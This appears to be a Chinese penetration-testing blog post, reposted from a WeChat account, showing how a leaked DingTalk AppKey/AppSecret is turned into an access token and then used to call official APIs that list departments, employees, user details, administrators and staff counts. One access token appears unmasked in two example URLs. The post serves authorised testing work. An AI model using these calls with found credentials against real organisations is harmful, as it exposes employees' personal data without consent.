渗透测试之钉钉AK/SK接口调用

admin 2024年8月5日10:45:13评论8 views字数 1794阅读5分58秒阅读模式

前言

前段时间在某众测项目中发现了一对钉钉的AK/SK,以前常见的都是微信和微博的,第一次遇到钉钉的,查阅官方API文档后记录一下方便师傅们遇到的时候利用。

正文

发现的AK/SK如下

渗透测试之钉钉AK/SK接口调用

其中利用的为appkey和appSecret,钉钉的认证接口为企业内部应用权限

,官方API地址为

https://open.dingtalk.com/document/orgapp/obtain-orgapp-token

所有服务都可在上述地址中查看调用文档,下面直接演示各个接口的调用过程

获取access_token

https://oapi.dingtalk.com/gettoken?appkey=dingv****************j&appsecret=UXHf***************************************XNu1

渗透测试之钉钉AK/SK接口调用

可以看到返回结果主要为token和有效期(2小时),然后获取企业部门列表

api1: https://oapi.dingtalk.com/department/list?access_token=8a5********************013api2(新版): https://oapi.dingtalk.com/topapi/v2/department/listsub?access_token=8a5********************013

渗透测试之钉钉AK/SK接口调用

获取子部门ID列表

https://oapi.dingtalk.com/topapi/v2/department/listsubid?access_token=8a5********************013&dept_id=1

渗透测试之钉钉AK/SK接口调用

获取部门用户基础信息

旧版api: https://oapi.dingtalk.com/user/simplelist?access_token=8a5********************013&department_id=1新版api: https://oapi.dingtalk.com/topapi/user/listsimple?access_token=8a5********************013&dept_id=1&cursor=0&size=100

渗透测试之钉钉AK/SK接口调用

获取部门用户详情

https://oapi.dingtalk.com/topapi/v2/user/list?access_token=8a5********************013&cursor=0&contain_access_limit=false&size=10&order_field=modify_desc&language=zh_CN&dept_id=10

渗透测试之钉钉AK/SK接口调用

获取管理员列表

https://oapi.dingtalk.com/topapi/user/listadmin?access_token=8a5cb0096a4233c09157f3b35381d013

渗透测试之钉钉AK/SK接口调用

sys_level表示管理员等级,2代表子管理员,1代表主管理员

获取员工人数

https://oapi.dingtalk.com/topapi/user/count?access_token=8a5cb0096a4233c09157f3b35381d013&only_active=false

渗透测试之钉钉AK/SK接口调用

only_active为是否包含未激活钉钉人数,false为包含未激活钉钉的人员数量,true为只包含激活钉钉的人员数量

查询用户详情

旧版api: https://oapi.dingtalk.com/user/get?access_token=8a5********************013&userid=1新版api: https://oapi.dingtalk.com/topapi/v2/user/get?access_token=8a5********************013&userid=1

渗透测试之钉钉AK/SK接口调用

结语

以上接口为常用的服务接口,这些接口在众测挖掘中已经足够证明危害,更多接口还请师傅们查看官方文档调用,像创建用户等增、删、改的操作一般也都没权限,真实项目中一般也不会允许使用这些操作。希望本篇文章能够帮助师傅们在项目中快速利用节省时间,有不足的地方也请多多指正。

原文始发于微信公众号(零壹安全):渗透测试之钉钉AK/SK接口调用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月5日10:45:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试之钉钉AK/SK接口调用http://cn-sec.com/archives/2982009.html

发表评论

匿名网友 填写信息